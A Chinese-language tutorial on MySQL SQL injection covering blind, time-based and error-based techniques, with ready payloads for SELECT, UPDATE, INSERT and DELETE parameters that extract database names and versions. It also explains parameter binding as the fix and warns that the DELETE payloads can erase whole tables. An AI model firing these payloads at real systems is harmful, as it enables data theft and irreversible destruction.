order by

select * from users order by $sth
说明：order by 之后是列名/列序号，属于标识符而非值，预编译语句的占位符无法绑定它，所以这里只能对 $sth 做白名单校验（限定为固定的列名集合）；只要是直接拼接，这个位置就是注入点，而且不需要闭合引号。

盲注的三种类型（布尔盲注、时间盲注、报错注入；严格来说报错注入会把数据直接带回错误信息，并不算"盲"注，这里按常见习惯一并列出）

  1. 逻辑判断（布尔盲注）regexp、like、ascii、left、ord、mid —— 根据页面对真/假两种条件的返回差异逐位推断数据
    like 'ro%'
    regexp '^user[a-z]'
    
    #截取字符串（MySQL 中起始位置从 1 开始，substr 与 substring 等价）
    mid(str,start_loc,length)
    substr(str,start_loc,length)
    left(str,length) #从左侧截取
    
    #字符串长度
    length() #返回字节数；含多字节字符（如 utf8mb4 中的中文）时用 char_length() 取字符数，否则按 length() 逐字符截取会错位
    
  2. 延时判断（时间盲注）if、sleep —— 页面对真/假没有任何内容差异时，用响应耗时作为信号
    -- Boolean probe only: 1>2 is false, so if() yields 0, the AND fails and no row is returned. No delay is involved.
    select * from users where id=1 and if(1>2,2,0);
    -- The delay is the signal, not the row set: AND sleep(5) does not return data, it only stalls the response.
    -- NOTE(review): sleep() is presumably evaluated once per row that satisfies id=1, so the total delay may scale
    -- with the number of matching rows — confirm against the target before choosing the timing threshold.
    select * from users where id=1 and sleep(5);
    -- Both branches delay; the response time (5s vs 10s) tells which branch ran, which is more robust than
    -- "delay vs no delay" when network jitter makes a fast reply hard to distinguish from a short sleep.
    select * from users where id=1 and if(1>2,sleep(5),sleep(10));
    
  3. 报错回显 floor、updatexml、extractvalue —— 前提是应用会把数据库错误信息原样显示给用户。注意：floor(rand(0)*2) 配合 group by 触发 Duplicate entry 报错，要求 from 的表里至少有 3 行数据（所以后面的语句都从 information_schema.tables / character_sets 取表）；updatexml/extractvalue 的报错信息只回显前 32 个字符，超长内容需要用 substr/mid 分段取出。

逻辑判断

例如:

?id=1' and length(database())=8--+
?id=1' and left(database(),1)>'a'--+
说明：--+ 中的 + 会被 URL 解码为空格，MySQL 的 -- 注释必须后跟空白才生效。left(database(),1)>'a' 这类字符串比较受排序规则影响，常见的 *_ci 排序规则不区分大小写（'a' 与 'A' 相等），需要精确二分时应改用 ascii()/ord() 比较数值，如下面延时判断的写法。

延时判断

and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+
说明：115 即 's'、101 即 'e'；条件为假时走 1/0 分支立即返回，以是否延时判断真假。逐字符推进时递增 substr 的起始位置，逐个表名推进时递增 limit 的偏移量（limit 1,1、limit 2,1 …）；延时阈值要明显大于正常响应时间的抖动，否则会误判。

报错注入

12种报错注入+万能语句

更新注入
update user set username='$name' where id = 1
说明：$name 被直接拼进 SQL 字符串，闭合单引号后即可注入；修复方式是把 $name 作为预编译语句的绑定参数传入，而不是转义后继续拼接。
$name = "' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '"
// 结果
update user set username='' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '' where id = 1

出现结果ERROR 1062(23000): Duplicate entry '1~security~' for key 'group_key',则得到库名为security; 若将database()改为version(),则提示ERROR 1062(23000): Duplicate entry '1~5.5.53~' for key 'group_key'。0x7e 即 '~'，作为定界符方便在错误信息里定位取出的值。注意：数据是随报错一起返回的，报错使整条 update 语句中止，没有行被真正修改；但如果报错条件没有触发（例如目标表行数不足），这条 update 会真的执行，set 后面的表达式被当作布尔值计算，username 会被覆盖成 0/1，所以在 update/delete 位置做报错注入前应先在测试环境确认报错能稳定触发。

  • 其他注入语句
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or  updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit
说明：%E7%94%B7 是 URL 编码的"男"。updatexml/extractvalue 的第二个参数被 0x7e（'~'）拼成非法的 XPath 表达式，MySQL 报错时会把该表达式原样回显，从而带出 version()/database() 的值。
插入注入
username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '
&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or updatexml(1,concat(0x7e,(version())),0) or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or extractvalue(1,concat(0x7e,database())) or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
删除注入
or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)
or+updatexml+(1,concat(0x7e,database()),0)
or+extractvalue(1,concat(0x7e,database()))
说明：+ 是 URL 编码的空格。这些 payload 都是以 or 接在 delete 的 where 条件之后，依赖子表达式报错来中止语句；一旦报错没有触发而表达式为真，where 条件恒真，会把整张表删掉，是不可逆的破坏性操作。只能在授权的测试环境中尝试，并优先在只读的 select 位置验证 payload 能稳定报错后再用于 delete/update 位置。